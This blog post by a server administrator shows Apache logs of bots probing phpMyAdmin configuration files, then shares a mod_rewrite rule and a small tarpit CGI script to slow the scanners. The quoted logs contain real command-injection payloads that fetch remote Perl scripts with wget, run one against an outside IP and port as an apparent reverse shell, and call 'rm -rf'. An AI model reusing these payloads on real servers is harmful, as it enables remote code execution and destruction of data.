Once or twice a night, I get visits from bots running on zombies, knocking on phpmyadmin and mysql admin, going from simple sniffs:
82.192.88.11 - - [26/May/2010:07:27:05 -0500] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 302 82.192.88.11 - - [26/May/2010:07:27:05 -0500] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 304 82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 306 82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 304 82.192.88.11 - - [26/May/2010:07:27:06 -0500] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 311 82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 306 82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 309 82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 309 82.192.88.11 - - [26/May/2010:07:27:07 -0500] "GET //config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 298 82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phppgadmin/config.inc.php?p=phpinfo(); HTTP/1.1" 404 302 82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phpmyadmin2/config.inc.php?p=phpinfo(); HTTP/1.1" 404 303 82.192.88.11 - - [26/May/2010:07:27:08 -0500] "GET //phpMyAdmin2/config.inc.php?p=phpinfo(); HTTP/1.1" 404 303 82.192.88.11 - - [26/May/2010:07:27:09 -0500] "GET //mail/config.inc.php?p=phpinfo(); HTTP/1.1" 404 296 82.192.88.11 - - [26/May/2010:07:27:09 -0500] "GET //webmail/config.inc.php?p=phpinfo(); HTTP/1.1" 404 299
to brazen attempts:
85.214.71.129 - - [09/Jul/2009:01:15:09 -0500] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20213.192.4.246/apache2-default/font-nix;perl%20font-nix HTTP/1.1" 404 309 85.214.71.129 - - [09/Jul/2009:01:15:10 -0500] "GET /phpmyadmin/config/config.inc.php?c=cd%20/tmp;wget%20213.192.4.246/apache2-default/font-nix;perl%20font-nix HTTP/1.1" 404 309 216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 404 310 216.177.193.80 - - [13/Aug/2009:11:48:54 -0500] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 //HTTP/1.1" 404 310 216.177.193.80 - - [13/Aug/2009:12:45:30 -0500] "GET //phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 404 310 216.177.193.80 - - [13/Aug/2009:12:45:30 -0500] "GET //phpMyAdmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 //HTTP/1.1" 404 310
There isn't much we can do about it, but we still can return some favors. There is an Apache module called mod_security but there isn't a pre-made package that works with Centos 5.5. I have tried using the RPM from Jason Litka's website but I get an error about missing dependencies when starting up Apache. I don't have development packages installed on any of my servers and I didn't feel like prepping a virtual machine just to rebuild the package.
But in the meantime, there is still some damage we can inflict using just mod_rewrite
Just add this to the Apache configuration file (either globally or inside the "VirtualHost" stanza:
RewriteEngine On RewriteRule ^.*config\.inc\.php.*$ /var/www/cgi-bin/tarpit.cgi [L] RewriteRule ^.*phpMyAdmin.*$ /var/www/cgi-bin/tarpit.cgi [NC,L]
And the contents of my tarpit.cgi?
#!/bin/sh echo Content-type: text/plain echo "" sleep 10 echo Do you feel lucky? sleep 10 echo Well, do ya, punk? sleep 10
Now it will take them 5 minutes to scan my site instead of 5 seconds, and all at minimal cost in CPU resources. Who knows, maybe the bot will get excited at not getting a 404 back and decide to probe further. We'll see...